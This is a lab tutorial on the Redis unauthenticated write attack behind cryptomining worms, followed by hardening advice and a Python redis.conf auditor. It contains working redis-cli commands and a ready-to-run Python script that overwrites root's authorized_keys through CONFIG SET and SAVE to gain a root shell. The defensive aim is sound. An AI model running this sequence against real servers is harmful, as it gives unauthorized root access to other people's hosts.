How to prevent Redis Mining

2025-01-17 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

This article walks through the attack behind "Redis mining" (an attacker abusing an unauthenticated or weakly protected Redis instance to gain a shell on the host and plant a cryptominer), step by step in a lab, and then lists the measures that prevent it. The steps are reproducible, so you can follow along on your own test machine.

1. Prerequisites

Condition 1: a reachable Redis instance, and knowledge of its port (default 6379).

Condition 2: the Redis instance has no password, or only a weak one that can be guessed.

Condition 3: the Redis process runs as root. This is the most destructive case, because SAVE can then write files anywhere on the host, including /root/.ssh.

2. Start making trouble

2.1 Generate a key pair

Generate one with ssh-keygen, or reuse a key pair you already have.

root@kali:/usr/local/src# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsa

Next, build the value that will be written into Redis from the public key, padded with newlines on both sides:

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > foo.txt

The contents are as follows

root@kali:/tmp/rediskey# cat foo.txt


ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali



The blank lines matter. SAVE writes an RDB dump, not a plain text file, so the key ends up sandwiched between the binary RDB header and trailer. The padding newlines put the key on a line of its own; sshd skips the surrounding lines it cannot parse and accepts the key line. Without the padding the key would be glued to the binary data on the same line and rejected.

2.2 Write the key into Redis

Do the following:

root@kali:/tmp/rediskey# cat foo.txt | redis-cli -h 192.168.243.129 -x set bar
OK

Log in to Redis and confirm the value was stored:

root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129
192.168.243.129:6379> get bar
"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n"

2.3 Overwrite a system file through the Redis SAVE mechanism

Now point the RDB dump at the root user's authorized_keys file and trigger a save:

192.168.243.129:6379> config set dir /root/.ssh
OK
192.168.243.129:6379> config get dir
1) "dir"
2) "/root/.ssh"
192.168.243.129:6379> config set dbfilename "authorized_keys"
OK
192.168.243.129:6379> save
OK
192.168.243.129:6379> exit

Now log in to the remote host with the private key and see the effect:

root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129
The authenticity of host '192.168.243.129 (192.168.243.129)' can't be established.
ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.243.129' (ECDSA) to the list of known hosts.
Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64
Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1
root@kali:~# w

That is a root shell on the target, obtained without any credentials. Strictly speaking this is not a privilege escalation but remote code execution through an unauthenticated service: the root privilege came from Redis already running as root. The file we wrote is not a normal authorized_keys file but a Redis RDB dump that happens to contain our key on its own line; open /root/.ssh/authorized_keys on the target if you want to see the binary header and trailer around it.
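The same write primitive, as an added example that is not code from the original article, driven over raw RESP instead of redis-cli so the exact bytes on the wire are visible. This is useful both for reproducing the attack in a lab and for writing network signatures: the CONFIG SET dir / dbfilename frames below are the literal byte patterns an IDS would match. The target host, port, key name "bar" and key file path are assumptions taken from the walkthrough above.

```python
# Added example: the Redis CONFIG SET dir/dbfilename + SAVE file-write primitive
# encoded by hand in RESP (the Redis wire protocol). Not part of the original
# article; host, port and key path are assumptions for a lab setup.
import socket
from typing import List


def resp_encode(*args: bytes) -> bytes:
    """Encode one command as a RESP array of bulk strings (what redis-cli sends)."""
    frame = b"*%d\r\n" % len(args)
    for arg in args:
        frame += b"$%d\r\n%s\r\n" % (len(arg), arg)
    return frame


def build_payload(pubkey_line: bytes) -> bytes:
    """Pad the public key with newlines so it lands on a line of its own inside the
    RDB dump; sshd skips the binary lines around it that it cannot parse."""
    return b"\n\n" + pubkey_line.strip() + b"\n\n"


def attack_commands(pubkey_line: bytes, ssh_dir: bytes = b"/root/.ssh") -> List[bytes]:
    """The exact command sequence from the walkthrough, as RESP frames."""
    return [
        resp_encode(b"SET", b"bar", build_payload(pubkey_line)),
        resp_encode(b"CONFIG", b"SET", b"dir", ssh_dir),
        resp_encode(b"CONFIG", b"SET", b"dbfilename", b"authorized_keys"),
        resp_encode(b"SAVE"),
    ]


def send_commands(host: str, port: int, frames: List[bytes], timeout: float = 5.0) -> List[str]:
    """Send each frame and collect its one-line reply (+OK, or -ERR / -NOAUTH on a
    hardened server). Every reply in this sequence is a RESP simple string or error,
    so one readline() per command is enough."""
    replies = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        reader = sock.makefile("rb")
        for frame in frames:
            sock.sendall(frame)
            replies.append(reader.readline().rstrip(b"\r\n").decode(errors="replace"))
    return replies


if __name__ == "__main__":
    # Lab usage (assumed paths): python3 redis_write.py 192.168.243.129 /tmp/rediskey/id_rsa.pub
    import sys
    target, key_path = sys.argv[1], sys.argv[2]
    with open(key_path, "rb") as f:
        frames = attack_commands(f.read())
    for frame, reply in zip(frames, send_commands(target, 6379, frames)):
        # frame.split(b"\r\n")[2] is the command name (index 0 is "*N", 1 is "$len")
        print(frame.split(b"\r\n")[2].decode(), "->", reply)
```

On a server that has requirepass set, the first reply is "-NOAUTH Authentication required." and nothing is written; on one where CONFIG has been renamed or denied by ACL, the SET succeeds but the CONFIG SET replies with an error, so the dump still goes to the normal data directory.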

3. How to prevent

This vulnerability is very powerful. Here we stopped at a root shell, but the same file write can just as easily drop a cron job that downloads and runs a script, which is exactly how Redis mining worms infect hosts in bulk.

The prevention techniques are as follows:

Do not let Redis listen on an address reachable from untrusted networks. Bind it to 127.0.0.1 or an internal interface, and if it must be exposed, restrict access with a firewall. Since Redis 3.2, protected-mode is on by default and refuses non-loopback connections when no bind address and no password are configured; do not turn it off.

Require a password (requirepass, or ACL users on Redis 6 and later), and make it a long random one rather than something guessable.

Do not run Redis as root; run it as a dedicated unprivileged user. It is also worth disabling or renaming CONFIG (rename-command CONFIG "" in redis.conf, or an ACL that denies @dangerous), so that a client which does get in cannot redirect SAVE to an arbitrary path.

With those three measures in place, the attack shown above no longer works, and the Redis mining worms that rely on it are stopped.
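An added example, not from the original article, that turns the three rules above (plus protected-mode and CONFIG exposure) into an offline check of a redis.conf file. The two sample configurations are constructed for illustration; the requirepass value in the hardened one is a placeholder, not a real secret. Whether the process runs as root is not visible in redis.conf, so it is passed in separately (for example from the systemd unit's User= or from ps).

```python
# Added example: audit a redis.conf text against the prevention rules discussed
# above. Not part of the original article; the sample configs are constructed.
from typing import List, Optional, Tuple

LOOPBACK = {"127.0.0.1", "::1", "localhost"}
ANY_ADDR = {"0.0.0.0", "*", "::", "::*"}

# Constructed sample: the kind of config the attack above works against.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
# requirepass is commented out, so unauthenticated clients are accepted
# requirepass foobared
"""

# Constructed sample: bound to loopback, long password, CONFIG disabled.
HARDENED_CONF = """\
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass 8f3c1e2b9a7d4c6e0b5a2f1d9c8e7b6a
rename-command CONFIG ""
"""


def parse_conf(text: str) -> dict:
    """Minimal redis.conf parser: directive -> list of argument lists, in file
    order. Comments and blank lines are skipped; a pair of surrounding quotes is
    stripped from each token (enough for rename-command CONFIG "")."""
    conf: dict = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = [p.strip('"\'') for p in line.split()]
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit_redis_conf(text: str, process_user: Optional[str] = None) -> List[Tuple[str, str]]:
    """Return (code, message) findings; an empty list means all checks passed."""
    conf = parse_conf(text)
    findings: List[Tuple[str, str]] = []

    # Rule 1: exposure. No bind line means every interface; so do the wildcard forms.
    bind_tokens = [t.lstrip("-") for args in conf.get("bind", []) for t in args]
    if not bind_tokens or any(t in ANY_ADDR for t in bind_tokens):
        findings.append(("bind-all", "listens on all interfaces; bind to 127.0.0.1 or firewall the port"))
    elif any(t not in LOOPBACK for t in bind_tokens):
        findings.append(("bind-external", "bound to a non-loopback address; confirm firewall rules"))
    pm = conf.get("protected-mode", [["yes"]])[-1]
    if pm and pm[0].lower() == "no":
        findings.append(("protected-mode-off", "protected-mode disabled; Redis will accept remote unauthenticated clients"))

    # Rule 2: authentication. Accept requirepass or an ACL user with a password
    # (">plain" or "#sha256" token); a requirepass of "" disables auth.
    pw_args = conf.get("requirepass", [[]])[-1]
    password = pw_args[0] if pw_args else ""
    acl_users = conf.get("user", [])
    acl_password = any("on" in a and any(t[:1] in (">", "#") for t in a) for a in acl_users)
    if not password and not acl_password:
        findings.append(("no-password", "no requirepass and no ACL user with a password"))
    elif password and len(password) < 16:
        findings.append(("weak-password", "requirepass is shorter than 16 characters"))

    # Extra check: can a client that gets in still redirect SAVE with CONFIG SET?
    config_renamed = any(a and a[0].upper() == "CONFIG" for a in conf.get("rename-command", []))
    config_denied = any("-@dangerous" in a or "-config" in a for a in acl_users)
    if not config_renamed and not config_denied:
        findings.append(("config-exposed", "CONFIG SET dir/dbfilename reachable; rename CONFIG or deny @dangerous via ACL"))

    # Rule 3: the process user (not in redis.conf; supplied by the caller).
    if process_user == "root":
        findings.append(("runs-as-root", "Redis runs as root; use a dedicated unprivileged user"))
    return findings


if __name__ == "__main__":
    for name, text, user in (("weak", WEAK_CONF, "root"), ("hardened", HARDENED_CONF, "redis")):
        print(name + ":")
        for code, msg in audit_redis_conf(text, process_user=user) or [("ok", "no findings")]:
            print("  [%s] %s" % (code, msg))
```

The parser is deliberately simple: it does not follow include directives or handle multi-line ACL files, so for a real deployment run it against the effective configuration (CONFIG GET on a trusted connection, or the file after includes are resolved).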

That covers the attack behind "Redis mining" and how to prevent it; the three prevention steps take only a few minutes to apply and are worth checking on every Redis instance you operate.

© 2024 shulou.com SLNews company. All rights reserved.
